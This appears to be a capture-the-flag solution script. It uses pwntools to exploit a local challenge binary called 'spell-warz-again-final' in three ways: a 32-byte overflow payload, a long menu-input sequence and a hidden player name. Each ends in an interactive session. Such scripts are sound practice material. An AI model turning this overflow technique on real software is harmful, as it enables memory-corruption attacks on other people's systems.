Ви не можете вибрати більше 25 тем
Теми мають розпочинатися з літери або цифри, можуть містити дефіси (-) і не повинні перевищувати 35 символів.
68 рядки
1.5 KiB
68 рядки
1.5 KiB
from pwn import process
|
|
|
|
FILENAME = "./spell-warz-again-final"
|
|
|
|
|
|
def poc0():
|
|
p = process(FILENAME)
|
|
print p.recvuntil(">")
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
print p.recvuntil(">")
|
|
p.sendline("2")
|
|
print p.recvuntil(">")
|
|
p.sendline("4")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
for _ in xrange(10):
|
|
print p.recvuntil(">")
|
|
p.sendline("100")
|
|
p.interactive()
|
|
|
|
|
|
def poc1():
|
|
p = process(FILENAME)
|
|
print p.recvuntil(">")
|
|
p.sendline("Leo")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
for _ in range(100):
|
|
print p.recvuntil(">")
|
|
p.sendline("3")
|
|
print p.recvuntil(">")
|
|
p.sendline("0")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
print p.recvuntil(">")
|
|
p.sendline("1")
|
|
print p.recvuntil(">")
|
|
p.sendline("4")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
for _ in range(10):
|
|
print p.recvuntil(">")
|
|
p.sendline("99")
|
|
p.interactive()
|
|
|
|
|
|
def poc2():
|
|
p = process(FILENAME)
|
|
print p.recvuntil(">")
|
|
p.sendline("__th3_w0rLd_D3str0Y3r__")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
print p.recvuntil(">")
|
|
p.sendline("2")
|
|
print p.recvuntil(">")
|
|
p.sendline("4")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
for _ in xrange(10):
|
|
print p.recvuntil(">")
|
|
p.sendline("100")
|
|
p.interactive()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
poc1()
|